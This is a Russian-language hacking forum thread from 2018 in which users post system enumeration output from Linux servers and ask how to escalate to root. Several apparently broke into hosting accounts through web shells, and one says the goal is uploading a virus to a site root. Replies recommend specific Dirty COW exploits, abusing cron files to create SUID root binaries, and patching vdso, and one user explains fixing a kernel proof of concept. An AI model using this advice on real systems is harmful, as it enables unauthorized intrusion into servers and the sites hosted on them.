Здравствуйте, вопрос по рутанью Linux машин. Дело обстоит так, есть некоторые права на сервере и доступ через SSH. Есть некоторая инфа Linux localhost.localdomain 2.6.32-696.13.2.el6.i686. Вопрос: какой дальнейший шаг нужно предпринять? Искать сплоиты под ядро и учиться их юзать?

Спасибо!

ShpillyWilly

25.01.2018, 13:29

Dr_Wile said:
↑ (https://antichat.live/posts/4177219/)
Здравствуйте, вопрос по рутанью Linux машин. Дело обстоит так, есть некоторые права на сервере и доступ через SSH. Есть некоторая инфа Linux localhost.localdomain 2.6.32-696.13.2.el6.i686. Вопрос: какой дальнейший шаг нужно предпринять? Искать сплоиты под ядро и учиться их юзать?
Спасибо!

для начала вот

Сообщение с вопросом должно содержать информацию из вывода следующих команд:

uname -a

ls -la /boot

lls -la --full-time /lib (или /lib64)

mount

df -h

cat /etc/issue

cat /etc/crontab (ls -la cron.d, cron.hourly, cron.monthly, cron.weekly) + вывод содержимого каждого файла из этих директорий.

cat /proc/version

cat /proc/sys/vm/mmap_min_addr

pwd

ls -la /usr/bin/staprun

find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
Так же обязательно писать всё, что вы пробовали для повышения привилегий, какие возникли ошибки.

Dr_Wile

25.01.2018, 13:42

uname -a

Linux localhost.localdomain 2.6.32-696.13.2.el6.i686 #1 SMP Thu Oct 5 20:42:25 UTC 2017 i686 i686 i386 GNU/Linux

ls -la /boot

total 46022

dr-xr-xr-x. 5 root root 1024 Nov 3 10:26 .

dr-xr-xr-x. 21 root root 4096 Dec 28 09:15 ..

-rw-r--r--. 1 root root 109953 Nov 22 2013 config-2.6.32-431.el6.i686

-rw-r--r--. 1 root root 112821 Oct 6 02:47 config-2.6.32-696.13.2.el6.i686

drwxr-xr-x. 3 root root 1024 Nov 3 09:51 efi

drwxr-xr-x. 2 root root 1024 Nov 3 10:26 grub

-rw-------. 1 root root 14825818 Nov 3 09:53 initramfs-2.6.32-431.el6.i686.img

-rw-------. 1 root root 19445667 Nov 3 10:26 initramfs-2.6.32-696.13.2.el6.i686.img

drwx------. 2 root root 12288 Nov 3 09:45 lost+found

-rw-r--r--. 1 root root 190104 Nov 22 2013 symvers-2.6.32-431.el6.i686.gz

-rw-r--r--. 1 root root 211993 Oct 6 02:48 symvers-2.6.32-696.13.2.el6.i686.gz

-rw-r--r--. 1 root root 1982877 Nov 22 2013 System.map-2.6.32-431.el6.i686

-rw-r--r--. 1 root root 2064350 Oct 6 02:47 System.map-2.6.32-696.13.2.el6.i686

-rwxr-xr-x. 1 root root 4002656 Nov 22 2013 vmlinuz-2.6.32-431.el6.i686

-rw-r--r--. 1 root root 164 Nov 22 2013 .vmlinuz-2.6.32-431.el6.i686.hmac

-rwxr-xr-x. 1 root root 4137568 Oct 6 02:47 vmlinuz-2.6.32-696.13.2.el6.i686

-rw-r--r--. 1 root root 169 Oct 6 02:47 .vmlinuz-2.6.32-696.13.2.el6.i686.hmac

mount

/dev/mapper/VolGroup-lv_root on / type ext4 (rw)

proc on /proc type proc (rw)

sysfs on /sys type sysfs (rw)

devpts on /dev/pts type devpts (rw,gid=5,mode=620)

tmpfs on /dev/shm type tmpfs (rw)

/dev/sda1 on /boot type ext4 (rw)

/dev/sdb1 on /usr/home type ext3 (rw)

none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

df -h

Filesystem Size Used Avail Use% Mounted on

/dev/mapper/VolGroup-lv_root

35G 1.5G 31G 5% /

tmpfs 503M 0 503M 0% /dev/shm

/dev/sda1 477M 48M 404M 11% /boot

/dev/sdb1 74G 49G 22G 70% /usr/home

cat /etc/issue

CentOS release 6.9 (Final)

Kernel \r on an \m

cat /etc/crontab

SHELL=/bin/bash

PATH=/sbin:/bin:/usr/sbin:/usr/bin

MAILTO=root

HOME=/

# For details see man 4 crontabs

# Example of job definition:

# .---------------- minute (0 - 59)

# | .------------- hour (0 - 23)

# | | .---------- day of month (1 - 31)

# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...

# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat

# | | | | |

# * * * * * user-name command to be executed

cat /proc/version

Linux version 2.6.32-696.13.2.el6.i686 (mockbuild@c1bl.rdu2.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-18) (GCC) ) #1 SMP Thu Oct 5 20:42:25 UTC 2017

cat /proc/sys/vm/mmap_min_addr

4096

ls -la /usr/bin/staprun

---s--x--- 1 root stapusr 178148 Mar 22 2017 /usr/bin/staprun

find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

-rwsr-x---. 1 root dbus 46120 Apr 22 2015 /lib/dbus-1/dbus-daemon-launch-helper

-rws--x--x. 1 root root 13028 Jun 20 2017 /usr/libexec/pt_chown

-rws--x--x. 1 vcsa root 6064 May 11 2016 /usr/libexec/mc/cons.saver

-rwsr-xr-x. 1 root root 256572 Aug 31 23:36 /usr/libexec/openssh/ssh-keysign

-rwsr-xr-x. 1 root root 7060 Oct 4 08:24 /usr/sbin/usernetctl

-rwsr-xr-x. 1 root root 18448 Oct 15 2014 /usr/sbin/scponlyc

-rwsr-xr-x. 1 root root 25980 Nov 23 2015 /usr/bin/passwd

-rwsr-xr-x. 1 root root 46780 Aug 24 2016 /usr/bin/crontab

-rwsr-xr-x. 1 root root 69452 May 11 2016 /usr/bin/chage

---s--x--x. 1 root root 126720 Jun 23 2017 /usr/bin/sudo

-rws--x--x. 1 root root 16616 Mar 22 2017 /usr/bin/chfn

-rwsr-xr-x. 1 root root 34828 May 11 2016 /usr/bin/newgrp

-rwsr-xr-x. 1 root root 74064 May 11 2016 /usr/bin/gpasswd

---s--x--- 1 root stapusr 178148 Mar 22 2017 /usr/bin/staprun

-rws--x--x. 1 root root 15432 Mar 22 2017 /usr/bin/chsh

-rwsr-xr-x. 1 root root 34168 Mar 22 2017 /sbin/unix_chkpwd

-rwsr-xr-x. 1 root root 9596 Mar 22 2017 /sbin/pam_timestamp_check

-rwsr-xr-x. 1 root root 34188 Mar 23 2017 /bin/su

-rwsr-xr-x. 1 root root 77456 Mar 22 2017 /bin/mount

-rwsr-xr-x. 1 root root 32080 Mar 22 2017 /bin/ping6

-rwsr-xr-x. 1 root root 50312 Mar 22 2017 /bin/umount

-rwsr-xr-x. 1 root root 36732 Mar 22 2017 /bin/ping

Пробовать я не знаю, что ибо впервые предпринимаю попытку что-либо рутировать. Мне бы алгоритм... как примерно получают рут права узнать. А дальше попробую в одну харю разобраться

ShpillyWilly

25.01.2018, 13:54

Dr_Wile said:
↑ (https://antichat.live/posts/4177242/)
uname -a
Linux localhost.localdomain 2.6.32-696.13.2.el6.i686 #1 SMP Thu Oct 5 20:42:25 UTC 2017 i686 i686 i386 GNU/Linux

ls -la /boot
total 46022
dr-xr-xr-x. 5 root root 1024 Nov 3 10:26 .
dr-xr-xr-x. 21 root root 4096 Dec 28 09:15 ..
-rw-r--r--. 1 root root 109953 Nov 22 2013 config-2.6.32-431.el6.i686
-rw-r--r--. 1 root root 112821 Oct 6 02:47 config-2.6.32-696.13.2.el6.i686
drwxr-xr-x. 3 root root 1024 Nov 3 09:51 efi
drwxr-xr-x. 2 root root 1024 Nov 3 10:26 grub
-rw-------. 1 root root 14825818 Nov 3 09:53 initramfs-2.6.32-431.el6.i686.img
-rw-------. 1 root root 19445667 Nov 3 10:26 initramfs-2.6.32-696.13.2.el6.i686.img
drwx------. 2 root root 12288 Nov 3 09:45 lost+found
-rw-r--r--. 1 root root 190104 Nov 22 2013 symvers-2.6.32-431.el6.i686.gz
-rw-r--r--. 1 root root 211993 Oct 6 02:48 symvers-2.6.32-696.13.2.el6.i686.gz
-rw-r--r--. 1 root root 1982877 Nov 22 2013 System.map-2.6.32-431.el6.i686
-rw-r--r--. 1 root root 2064350 Oct 6 02:47 System.map-2.6.32-696.13.2.el6.i686
-rwxr-xr-x. 1 root root 4002656 Nov 22 2013 vmlinuz-2.6.32-431.el6.i686
-rw-r--r--. 1 root root 164 Nov 22 2013 .vmlinuz-2.6.32-431.el6.i686.hmac
-rwxr-xr-x. 1 root root 4137568 Oct 6 02:47 vmlinuz-2.6.32-696.13.2.el6.i686
-rw-r--r--. 1 root root 169 Oct 6 02:47 .vmlinuz-2.6.32-696.13.2.el6.i686.hmac
mount
/dev/mapper/VolGroup-lv_root on / type ext4 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/sda1 on /boot type ext4 (rw)
/dev/sdb1 on /usr/home type ext3 (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/VolGroup-lv_root
35G 1.5G 31G 5% /
tmpfs 503M 0 503M 0% /dev/shm
/dev/sda1 477M 48M 404M 11% /boot
/dev/sdb1 74G 49G 22G 70% /usr/home
cat /etc/issue
CentOS release 6.9 (Final)
Kernel \r on an \m
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
cat /proc/version
Linux version 2.6.32-696.13.2.el6.i686 (mockbuild@c1bl.rdu2.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-18) (GCC) ) #1 SMP Thu Oct 5 20:42:25 UTC 2017
cat /proc/sys/vm/mmap_min_addr
4096
ls -la /usr/bin/staprun
---s--x--- 1 root stapusr 178148 Mar 22 2017 /usr/bin/staprun
find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
-rwsr-x---. 1 root dbus 46120 Apr 22 2015 /lib/dbus-1/dbus-daemon-launch-helper
-rws--x--x. 1 root root 13028 Jun 20 2017 /usr/libexec/pt_chown
-rws--x--x. 1 vcsa root 6064 May 11 2016 /usr/libexec/mc/cons.saver
-rwsr-xr-x. 1 root root 256572 Aug 31 23:36 /usr/libexec/openssh/ssh-keysign
-rwsr-xr-x. 1 root root 7060 Oct 4 08:24 /usr/sbin/usernetctl
-rwsr-xr-x. 1 root root 18448 Oct 15 2014 /usr/sbin/scponlyc
-rwsr-xr-x. 1 root root 25980 Nov 23 2015 /usr/bin/passwd
-rwsr-xr-x. 1 root root 46780 Aug 24 2016 /usr/bin/crontab
-rwsr-xr-x. 1 root root 69452 May 11 2016 /usr/bin/chage
---s--x--x. 1 root root 126720 Jun 23 2017 /usr/bin/sudo
-rws--x--x. 1 root root 16616 Mar 22 2017 /usr/bin/chfn
-rwsr-xr-x. 1 root root 34828 May 11 2016 /usr/bin/newgrp
-rwsr-xr-x. 1 root root 74064 May 11 2016 /usr/bin/gpasswd
---s--x--- 1 root stapusr 178148 Mar 22 2017 /usr/bin/staprun
-rws--x--x. 1 root root 15432 Mar 22 2017 /usr/bin/chsh
-rwsr-xr-x. 1 root root 34168 Mar 22 2017 /sbin/unix_chkpwd
-rwsr-xr-x. 1 root root 9596 Mar 22 2017 /sbin/pam_timestamp_check
-rwsr-xr-x. 1 root root 34188 Mar 23 2017 /bin/su
-rwsr-xr-x. 1 root root 77456 Mar 22 2017 /bin/mount
-rwsr-xr-x. 1 root root 32080 Mar 22 2017 /bin/ping6
-rwsr-xr-x. 1 root root 50312 Mar 22 2017 /bin/umount
-rwsr-xr-x. 1 root root 36732 Mar 22 2017 /bin/ping
Пробовать я не знаю, что ибо впервые предпринимаю попытку что-либо рутировать. Мне бы алгоритм... как примерно получают рут права узнать. А дальше попробую в одну харю разобраться

в первом сообщении топика ссыль) /threads/manual-novichkam-rutane.151993/ (https://antichat.live/threads/manual-novichkam-rutane.151993/)

Dr_Wile

25.01.2018, 14:18

dmax0fw

25.01.2018, 16:37

ShpillyWilly said:
↑ (https://antichat.live/posts/4177245/)
в первом сообщении топика ссыль)
/threads/manual-novichkam-rutane.151993/ (https://antichat.live/threads/manual-novichkam-rutane.151993/)

вся суть статьи в том, как скачать сплоит и запустить

статья ориентирована на новичков,но никакого понимания сути повышения привилегий она не даёт

вот если бы он описал детально работу сплоита - тогда было бы понимание сути, а иначе пользы в ней минимум

а в конце вообще до смешного доходит - у него есть рутовый доступ к машине, а он предлагает php бекдоры пихать для закрепления

Dr_Wile said:
↑ (https://antichat.live/posts/4177219/)
Вопрос: какой дальнейший шаг нужно предпринять?

почитай вот эту статью лучше

https://xakep.ru/2015/02/24/hack-admin-rules-linux/

особенно обращая внимание на вторую часть, где обсуждаются ошибки конфигурации

vasyaz

27.03.2018, 22:09

Подскажите сплоит для поднятия прав.

$ uname -a

Linux ga***4126.host****.com 3.10.0-693.11.6.1.ELK.el6.x86_64 #1 SMP Tue Jan 23 10:30:30 MST 2018 x86_64 x86_64 x86_64 GNU/Linux

$ mount

/dev/sda2 on / type ext4 (rw,usrjquota=quota.user,jqfmt=vfsv0)

proc on /proc type proc (rw)

sysfs on /sys type sysfs (rw)

devpts on /dev/pts type devpts (rw,gid=5,mode=620)

tmpfs on /dev/shm type tmpfs (rw,noexec,nosuid,nodev,noatime,mode=711,size=500M )

/dev/sda3 on /tmp type ext4 (rw,noexec,nosuid,nodev,noatime)

/dev/sda1 on /usr type ext4 (rw,nodev,usrjquota=quota.user,jqfmt=vfsv0)

/dev/sda6 on /var type ext4 (rw,nosuid,nodev,noatime,nodiratime,usrjquota=quot a.user,jqfmt=vfsv0)

/dev/sdb1 on /home1 type ext4 (rw,nosuid,nodev,noatime,usrjquota=quota.user,jqfm t=vfsv0)

/dev/sdc1 on /home2 type ext4 (rw,nosuid,nodev,noatime,usrjquota=quota.user,jqfm t=vfsv0)

/dev/sdd1 on /home3 type ext4 (rw,nosuid,nodev,noatime,usrjquota=quota.user,jqfm t=vfsv0)

/dev/sde1 on /home4 type ext4 (rw,nosuid,nodev,noatime,usrjquota=quota.user,jqfm t=vfsv0)

tmpfs on /ramdisk type tmpfs (rw,nosuid,nodev,noatime,size=4096m)

none on /var/spool/exim type tmpfs (rw,noexec,nosuid,nodev,noatime,uid=47,gid=12,mode =750)

tmpfs on /var/mysqltmp type tmpfs (rw,noexec,nosuid,nodev,noatime,mode=700,uid=498,g id=498,size=4096m)

none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

/tmp on /var/tmp type none (rw,noexec,nosuid,bind)

/ramdisk/home on /home type none (ro,nosuid,nodev,bind,noatime,nodiratime)

none on /sys/fs/cgroup type cgroup (rw,hugetlb,blkio,freezer,devices,memory,cpuacct,c pu,cpuset,clone_children)

/dev/mapper/vg_dr-lv_backups_root on /eig_backup type ext4 (rw,noexec,nosuid,nodev,_netdev,noatime,noquota,di scard)

/dev/mapper/vg_dr-lv_backups_home1 on /eig_backup/****3176.host****.com/backup1 type ext4 (rw,noexec,nosuid,nodev,_netdev,noatime,noquota,di scard)

/dev/mapper/vg_dr-lv_backups_home2 on /eig_backup/****3176.host****.com/backup2 type ext4 (rw,noexec,nosuid,nodev,_netdev,noatime,noquota,di scard)

/dev/mapper/vg_dr-lv_backups_home3 on /eig_backup/****3176.host****.com/backup3 type ext4 (rw,noexec,nosuid,nodev,_netdev,noatime,noquota,di scard)

/dev/mapper/vg_dr-lv_backups_home4 on /eig_backup/****3176.host****.com/backup4 type ext4 (rw,noexec,nosuid,nodev,_netdev,noatime,noquota,di scard)

$ df -h

Filesystem Size Used Avail Use% Mounted on

/dev/sda2 15G 12G 1.9G 87% /

tmpfs 500M 40K 500M 1% /dev/shm

/dev/sda3 9.5G 562M 8.5G 7% /tmp

/dev/sda1 39G 33G 3.6G 91% /usr

/dev/sda6 152G 134G 16G 90% /var

/dev/sdb1 1.8T 1.7T 158G 92% /home1

/dev/sdc1 1.8T 1.7T 101G 95% /home2

/dev/sdd1 1.8T 1.7T 97G 95% /home3

/dev/sde1 1.8T 1.7T 109G 95% /home4

tmpfs 4.0G 0 4.0G 0% /ramdisk

none 32G 20M 32G 1% /var/spool/exim

tmpfs 4.0G 8.0K 4.0G 1% /var/mysqltmp

/dev/mapper/vg_dr-lv_backups_root

589G 195G 364G 35% /eig_backup

/dev/mapper/vg_dr-lv_backups_home1

1.8T 1.3T 470G 74% /eig_backup/****3176.host****.com/backup1

/dev/mapper/vg_dr-lv_backups_home2

1.8T 1.5T 306G 83% /eig_backup/****3176.host****.com/backup2

/dev/mapper/vg_dr-lv_backups_home3

1.8T 1.4T 324G 82% /eig_backup/****3176.host****.com/backup3

/dev/mapper/vg_dr-lv_backups_home4

1.8T 1.2T 612G 65% /eig_backup/****3176.host****.com/backup4

$ pwd

/home4/omar/public_html/sitename.net/admin/uploads

$ ls -la /usr/bin/staprun

---s--x--- 1 root stapusr 183072 Mar 21 2017 /usr/bin/staprun

$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

-rwsr-xr-x 1 root root 38718 Sep 18 2017 /usr/local/apache/bin/suexec

-r-sr-xr-x 1 root root 232863 Jun 9 2017 /usr/local/bin/cdcc

-r-sr-xr-x 1 root root 629345 Jun 9 2017 /usr/local/bin/dccproc

-rwsr-xr-x. 1 root root 28968 Aug 30 2012 /usr/local/apache.backup/bin/suexec

-rws--x--x 1 root root 14736 Jun 19 2017 /usr/libexec/pt_chown

-rwsr-xr-x 1 root root 257824 Aug 31 2017 /usr/libexec/openssh/ssh-keysign

-rwsr-xr-x 1 root root 14368 Mar 17 2015 /usr/libexec/polkit-1/polkit-agent-helper-1

-rwsr-xr-x 1 abrt abrt 10296 Mar 23 2017 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache

---s--x--- 1 root stapusr 183072 Mar 21 2017 /usr/bin/staprun

-rws--x--x 1 root root 20184 Jan 26 01:41 /usr/bin/chfn

-rwsr-xr-x 1 root root 30768 Nov 23 2015 /usr/bin/passwd

---s--x--x 1 root root 123832 Jun 22 2017 /usr/bin/sudo

-rwsr-xr-x. 1 root root 128282 Mar 11 2013 /usr/bin/crontab

-rwsr-xr-x 1 root root 70480 May 10 2016 /usr/bin/chage

-rwsr-xr-x 1 root root 75640 May 10 2016 /usr/bin/gpasswd

-rwsr-xr-x 1 root root 82752 Jul 23 2015 /usr/bin/quota

-rwsr-xr-x 1 root root 54464 Mar 21 2017 /usr/bin/at

-rwsr-xr-x 1 root root 40240 May 10 2016 /usr/bin/newgrp

-rwsr-xr-x 1 root root 22544 Mar 17 2015 /usr/bin/pkexec

-r-s--x---. 1 root 48 13984 Jul 7 2011 /usr/sbin/suexec

-rwsr-xr-x 1 root root 9000 Oct 3 21:26 /usr/sbin/usernetctl

-rwsr-xr-x 1 root root 1255280 Feb 7 13:23 /usr/sbin/exim

-rwsr-xr-x 1 root root 2862863 Nov 2 2016 /opt/suphp/sbin/suphp

-rwsr-xr-x 1 root root 34840 Mar 22 2017 /sbin/unix_chkpwd

-rwsr-xr-x 1 root root 10272 Mar 22 2017 /sbin/pam_timestamp_check

-r-sr-xr-x 1 root root 185196 Jun 9 2017 /var/dcc/libexec/dccsight

-rwsr-sr-x 1 mailman mailman 21647 Aug 3 2017 /eig_backup/****3176.host****.com/usr/local/cpanel/3rdparty/mailman/cgi-bin/confirm

-rwsr-sr-x 1 mailman mailman 21647 Aug 3 2017 /eig_backup/****3176.host****.com/usr/local/cpanel/3rdparty/mailman/cgi-bin/admin

-rwsr-sr-x 1 mailman mailman 21647 Aug 3 2017 /eig_backup/****3176.host****.com/usr/local/cpanel/3rdparty/mailman/cgi-bin/edithtml

-rwsr-sr-x 1 mailman mailman 21647 Aug 3 2017 /eig_backup/****3176.host****.com/usr/local/cpanel/3rdparty/mailman/cgi-bin/roster

-rwsr-sr-x 1 mailman mailman 21647 Aug 3 2017 /eig_backup/****3176.host****.com/usr/local/cpanel/3rdparty/mailman/cgi-bin/options

-rwsr-sr-x 1 mailman mailman 21647 Aug 3 2017 /eig_backup/****3176.host****.com/usr/local/cpanel/3rdparty/mailman/cgi-bin/listinfo

-rwsr-sr-x 1 mailman mailman 21647 Aug 3 2017 /eig_backup/****3176.host****.com/usr/local/cpanel/3rdparty/mailman/cgi-bin/admindb

-rwsr-sr-x 1 mailman mailman 21647 Aug 3 2017 /eig_backup/****3176.host****.com/usr/local/cpanel/3rdparty/mailman/cgi-bin/subscribe

-rwsr-sr-x 1 mailman mailman 21647 Aug 3 2017 /eig_backup/****3176.host****.com/usr/local/cpanel/3rdparty/mailman/cgi-bin/private

-rwsr-xr-x 1 mailman mailman 24119 Aug 3 2017 /eig_backup/****3176.host****.com/usr/local/cpanel/3rdparty/mailman/bin/setuid-wrapper

-rwsr-x--- 1 root dbus 46232 Apr 22 2015 /lib64/dbus-1/dbus-daemon-launch-helper

-rwsr-xr-x 1 root root 38520 Mar 21 2017 /bin/ping

-rwsr-xr-x 1 root root 53480 Jan 26 01:41 /bin/umount

-rwsr-xr-x 1 root root 77560 Jan 26 01:41 /bin/mount

-rwsr-x--- 1 root wheel 34904 Mar 22 2017 /bin/su

-rwsr-xr-x 1 root root 36488 Mar 21 2017 /bin/ping6

$ id

uid=32200(omar) gid=32202(omar) groups=32202(omar)

Остальные команды не выводятся.

zifus

25.05.2018, 19:48

Привет всем.. Можете подсказать есть ли сплоит под это...

Linux version 2.6.32-896.16.1.lve1.4.49.el6.x86_64 (mockbuild@build.cloudlinux.com) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-18) (GCC) ) #1 SMP Fri Jan 5 05:15:23 EST 2018

\/IRUS

23.07.2018, 12:49

Здравствуйте.

Есть исходник сплоита который мне подходит

Linux Kernel

\/IRUS

23.07.2018, 14:14

BabaDook said:
↑ (https://antichat.live/posts/4229577/)
там же мануал есть

ты про строку "You could modifiy one byte to manipulate rip register, but I do not tried hard to get root." в комментарии

да, инфы там.... на одну строку

\/IRUS

23.07.2018, 14:31

BabaDook said:
↑ (https://antichat.live/posts/4229603/)
нет я про строки
* $ gcc -o exploit exploit.c -lpthread
* $./exploit

я про сам код, его намерено сломали, он компилится но не дает нужный результат

dmax0fw

23.07.2018, 16:54

\/IRUS said:
↑ (https://antichat.live/posts/4229606/)
он компилится но не дает нужный результат

а какой результат ты от него ждёшь? в коде нет ничего, что выбросило бы тебя в рутовый шелл

это скорее PoC, который требует допиливания, чем полноценный эксплоит для получения рута

\/IRUS

23.07.2018, 20:43

dmax0fw said:
↑ (https://antichat.live/posts/4229625/)
а какой результат ты от него ждёшь? в коде нет ничего, что выбросило бы тебя в рутовый шелл
это скорее PoC, который требует допиливания, чем полноценный эксплоит для получения рута

спасибо кэп

конечно же это proof of concept, даже Вася бухарь с мусорки увидел бы этот факт

я уже допилил код

ошибка была на виду, в стоке char next_ptr[8] = "\x30\xff\xff\x31\xff\xff\xff\xff"; должно было быть char next_ptr[9]....

хорошо хоть памяти в буфере было достаточно чтобы сделать безусловный переход на свой код

zifus

01.08.2018, 02:25

Привет всем.. Нужна ваша помощь, бьюсь уже 2 день..

Есть сервер Linux 2.6.32-673.26.1.lve1.4.15.el6.x86_64 #1 SMP Sun Jul 17 09:01:31 EDT 2016 x86_64 x86_64 x86_64

Отработал сплоит dirty (https://github.com/FireFart/dirtycow/blob/master/dirty.c), passwd изменился, su на сервере нет и я побежал подключаться по ssh.

При подключении пароль не подходит. suid файлов на сервере нет. Как можно поступить в такой ситуации?

dmax0fw

01.08.2018, 17:28

zifus said:
↑ (https://antichat.live/posts/4232618/)
suid файлов на сервере нет

zifus said:
↑ (https://antichat.live/posts/4232618/)
su на сервере нет

сфеерический сервер в вакууме

zifus said:
↑ (https://antichat.live/posts/4232618/)
Как можно поступить в такой ситуации?

можно перезаписать что-нибудь в /etc/cron.d/ и исполнить свой скрипт от рута

ну или накрайняк патчить vdso

под обе ситуации есть сплоиты на гитхабе

zifus

01.08.2018, 18:41

dmax0fw said:
↑ (https://antichat.live/posts/4232786/)
сфеерический сервер в вакууме
можно перезаписать что-нибудь в /etc/cron.d/ и исполнить свой скрипт от рута
ну или накрайняк патчить vdso
под обе ситуации есть сплоиты на гитхабе

На сервере оказался один единственный /etc/cron.daily/tmpwatch

Только закончил шаманить с ним, посмотрим как отработает..

Как-то пропустил мимо сплоит pokemon.c (https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c)через него прописал задание в tmpwatch

на созание SUID

karkajoi

17.08.2018, 19:40

Добрый день, что можно по пробовать применить под

Linux infong278 3.16.0-ui18135.21-uiabi1-infong-amd64 #1 SMP Debian 3.16.56-1~ui

80+1 (2018-05-15) x86_64 GNU/Linux

Больше инфы могу предоставить поже

dmax0fw

19.08.2018, 11:18

man474019 said:
↑ (https://antichat.live/posts/4237841/)
https://www.exploit-db.com/exploits/37292/
https://www.exploit-db.com/exploits/44302/

ядро собрано в мае этого года, логично предположить, что на него наложены все доступные патчи на момент сборки, а следовательно то, что вы предложили - не сработает

Sensoft

27.09.2018, 14:09

Есть web shell на Linux CentOS-74-64-minimal 3.10.0-693.21.1.el7.x86_64

Права на запись есть только в некоторых папках нужен корень сайта для заливки вируса, как поднять права в корне ?

kristinka_sk

25.10.2018, 01:33

Obiazetalno nuzno ispolzovat' backconnect+putty? V wso cherez browser mozno ze vse toze samoe sdelat'

Linux webclust4.cnh.at 3.2.0-5-amd64 #1 SMP Debian 3.2.96-3 x86_64

PiroCat

25.10.2018, 12:29

Здравствуйте. Камрады, подскажите, реально ли повысить привелегии на свежих ядрах? или без приватных эксплоитов это не возможно?

Linux vps459476.ovh.net 3.10.0-862.3.2.el7.x86_64 #1 SMP Mon May 21 23:36:36 UTC 2018 x86_64

к примеру?

Быть может есть альтернативные варианты?

dmax0fw

25.10.2018, 13:05

PiroCat said:
↑ (https://antichat.live/posts/4255150/)
Здравствуйте. Камрады, подскажите, реально ли повысить привелегии на свежих ядрах? или без приватных эксплоитов это не возможно?

на свежих ядрах врятли получится без 0day

в вашем случае оно не прям чтобы супер свежее, можно конечно попытаться недавними сплоитами, но врятли выйдет

PiroCat said:
↑ (https://antichat.live/posts/4255150/)
Быть может есть альтернативные варианты?

конечно же есть - ошибки в конфигурации, небезопасные права доступа и тд и тп, версия ядра далеко не показатель

PiroCat

28.10.2018, 17:14

Хм. Пока я изучал кронтаб и вложеные файлы случайно наткнулся на этот эксплоит.

https://vulners.com/thn/THN:E895DCB05CD71F3E251E0F953DC4C77F

В статье сказано, что о баге было сообщено разработчикам в сентябре\августе 2018. А так же, что он сработает только на 64-битной системе.

Кроме того, обязательным требованием является суидный бит, который у нас есть, а так же сказано, что системы с обьемом памяти меньше 32 гб вряд-ли будут уязвимы.

Как понять "вряд-ли"? от чего это зависит?

Linux vps459476.ovh.net 3.10.0-862.3.2.el7.x86_64 #1 SMP Mon May 21 23:36:36 UTC 2018 x86_64

$ cat /proc/meminfo

MemTotal: 7815136 kB

MemFree: 591612 kB

MemAvailable: 5552304 kB

p.s. подскажите, с какими аргументами будет правильно компилировать этот сплоит?

https://www.exploit-db.com/raw/45516/

спасибо.

PiroCat

08.11.2018, 05:35

Всем привет. Был занят некоторое время, вернулся к тому серваку.

Подскажите, не могу получите сессию неткат через бинд-порт\бэк-коннект.

Использую модифицированный ВСО, пробовал и оригинал. Не на СИ не на ПЕРЛ не бинд-порт не бэк-коннект не срабатывает.

Пользуюсь сервисом ngrok для туннелирования. Подскажите, куда копать?

p.s. группа юзера из под которого запущен апач mgrsecure

PiroCat

08.11.2018, 06:27

И еще вопрос. В шапке указаны команды для вывода информации, где может быть потенциально уязвимая часть ОС. Но нету никаких комментариев на этот счет. Немогли бы вы хоть в двух словах разжевать что к чему в этих строках? Я немного модифицировал команды для более полного вывода.

$ uname -a

Code:
Linux vps459476.ovh.net 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

//ну тут вроде бы понятно

$ ls -all /boot

Code:
total 308208
dr-xr-xr-x. 5 root root 4096 Oct 31 15:50 .
dr-xr-xr-x. 19 root root 4096 Nov 7 03:01 ..
-rw-r--r-- 1 root root 171 Jul 4 2017 .vmlinuz-3.10.0-514.26.2.el7.x86_64.hmac
-rw-r--r-- 1 root root 171 Jan 25 2018 .vmlinuz-3.10.0-693.17.1.el7.x86_64.hmac
-rw-r--r-- 1 root root 170 Sep 13 2017 .vmlinuz-3.10.0-693.2.2.el7.x86_64.hmac
-rw-r--r-- 1 root root 171 Sep 26 17:15 .vmlinuz-3.10.0-862.14.4.el7.x86_64.hmac
-rw-r--r-- 1 root root 170 May 22 01:50 .vmlinuz-3.10.0-862.3.2.el7.x86_64.hmac
-rw------- 1 root root 3114352 Jul 4 2017 System.map-3.10.0-514.26.2.el7.x86_64
-rw------- 1 root root 3232454 Jan 25 2018 System.map-3.10.0-693.17.1.el7.x86_64
-rw------- 1 root root 3228852 Sep 13 2017 System.map-3.10.0-693.2.2.el7.x86_64
-rw------- 1 root root 3414754 Sep 26 17:15 System.map-3.10.0-862.14.4.el7.x86_64
-rw------- 1 root root 3409912 May 22 01:50 System.map-3.10.0-862.3.2.el7.x86_64
-rw-r--r-- 1 root root 137701 Jul 4 2017 config-3.10.0-514.26.2.el7.x86_64
-rw-r--r-- 1 root root 140915 Jan 25 2018 config-3.10.0-693.17.1.el7.x86_64
-rw-r--r-- 1 root root 140898 Sep 13 2017 config-3.10.0-693.2.2.el7.x86_64
-rw-r--r-- 1 root root 147859 Sep 26 17:15 config-3.10.0-862.14.4.el7.x86_64
-rw-r--r-- 1 root root 147823 May 22 01:50 config-3.10.0-862.3.2.el7.x86_64
